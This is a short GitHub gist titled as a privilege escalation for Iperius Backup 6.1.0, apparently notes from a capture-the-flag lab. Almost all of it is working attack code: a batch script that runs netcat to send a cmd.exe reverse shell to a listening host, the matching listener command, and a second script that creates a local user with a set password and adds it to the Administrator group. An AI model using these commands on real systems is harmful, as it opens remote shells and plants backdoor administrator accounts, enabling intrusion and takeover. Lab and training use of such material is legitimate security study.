Skip to content

Instantly share code, notes, and snippets.

@alivx
Last active December 13, 2021 20:03
Show Gist options
  • Save alivx/6780a10b299cd687339eb0377a32f88d to your computer and use it in GitHub Desktop.
Save alivx/6780a10b299cd687339eb0377a32f88d to your computer and use it in GitHub Desktop.
Iperius Backup 6.1.0 - Privilege Escalation

#Source @echo off C:/Users/McSkidy/Downloads/nc.exe -nv 10.10.89.237 1992 -nv -e cmd.exe

#Des nc -nlvp 1992

change password

@echo off net user husky MYpassword123 /add && net localgroup Administrator husky /add

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment